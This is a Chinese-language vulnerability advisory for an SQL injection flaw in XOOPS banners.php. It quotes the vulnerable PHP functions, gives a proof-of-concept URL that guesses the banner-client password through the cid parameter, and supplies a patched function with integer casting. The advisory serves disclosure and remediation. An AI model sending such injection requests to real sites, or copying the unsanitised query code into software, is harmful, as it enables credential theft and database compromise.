涉及程序：
xoops 1.3.x版,2.0.x版到2.0.5版
  
描述：
xoops存在sql注入缺陷
  
详细：
xoops是一款用php编写的动态web站点程序。

xoops程序banners.php文件中的代码存在错误，允许未经授权的用户重定义本地变量并注入sql命令：


  code: [copy to clipboard]   
<?

[...]

function emailstats($login, $cid, $bid, $pass)
{
global $xoopsdb, $xoopsconfig;
$result2 = $xoopsdb->query("select name, email from
".$xoopsdb->prefix("bannerclient")." where cid=$cid");
list($name, $email) = $xoopsdb->fetchrow($result2);
if ( $email == "" ) {
redirect_header("banners.php",3,"there isn't an email associated with
client ".$name.".<br />please contact the administrator");

exit();
} else {
$result = $xoopsdb->query("select bid, imptotal, impmade, clicks,
imageurl, clickurl, date from ".$xoopsdb->prefix("banner")." where bid=$bid
and cid=$cid");
list($bid, $imptotal, $impmade, $clicks, $imageurl, $clickurl, $date) =
$xoopsdb->fetchrow($result);
[...]

$fecha = date("f js y, h:ia.");
$subject = "your banner statistics at ".$xoopsconfig[sitename]."";
$message = "following are the complete stats for your advertising
investment at ". $xoopsconfig['sitename']." :\n\n\nclient name:
$name\nbanner id: $bid\nbanner image: $imageurl\nbanner url:
$clickurl\n\nimpressions purchased: $imptotal\nimpressions made:
$impmade\nimpressions left: $left\nclicks received: $clicks\nclicks percent:
$percent%\n\n\nreport generated on: $fecha";
$xoopsmailer =& getmailer();
$xoopsmailer->usemail();
$xoopsmailer->settoemails($email);
$xoopsmailer->setfromemail($xoopsconfig['adminmail']);
$xoopsmailer->setfromname($xoopsconfig['sitename']);
$xoopsmailer->setsubject($subject);
$xoopsmailer->setbody($message);
$xoopsmailer->send();
redirect_header("banners.php?op=ok&login=$login&pass=$pass",3,"stati
stics
for your banner has been sent to your email address.");
//include "footer.php";
exit();
}
}

function change_banner_url_by_client($login, $pass, $cid, $bid, $url)
{
global $xoopsdb;
$result = $xoopsdb->query("select passwd from
".$xoopsdb->prefix("bannerclient")." where cid=".$cid."");
list($passwd) = $xoopsdb->fetchrow($result);
if ( $pass == $passwd ) {
$xoopsdb->queryf("update ".$xoopsdb->prefix("banner")." set
clickurl='".$url."' where bid=".$bid."");
}
redirect_header("banners.php?op=ok&login=$login&pass=$pass",3,"url
has been changed.");
//include "footer.php";
exit();
}

[...]

switch ( $op ) {
case "change":
change_banner_url_by_client($login, $pass, $cid, $bid, $url);
break;
case "emailstats":
emailstats($login, $cid, $bid, $pass);
break;
[...]
}

?>  



攻击者通通过向目标服务器提交精心构造的下列格式的url请求能触发该缺陷：
http://[target]/banners.php?op=emailstats&cid=1%20and%20passwd%20like%20'a%'/*  
  
攻击方法：
示例代码：
http://[target]/banners.php?op=emailstats&cid=1%20and%20passwd%20like%20'a%'/*  
  
解决方案：
用下列代码替换banners.php文件中的change_banner_url_by_client()函数：


  code: [copy to clipboard]   
function change_banner_url_by_client($login, $pass, $cid, $bid, $url)
{
global $xoopsdb;
if ( !empty($cid) and !empty($bid) and !empty($pass) ){
$result = $xoopsdb->query("select passwd from
".$xoopsdb->prefix("bannerclient")." where cid='".$cid."'");
list($passwd) = $xoopsdb->fetchrow($result);
if ( $pass == $passwd ) {
$xoopsdb->queryf("update ".$xoopsdb->prefix("banner")." set
clickurl='".$url."' where bid='".$bid."'");
}
redirect_header("banners.php?op=ok&login=$login&pass=$pass",3,"url
has been changed.");
//include "footer.php";
}
exit();
}  



在“switch($op) {”前添加下列代码：
$cid = intval($cid);
$bid = intval($bid);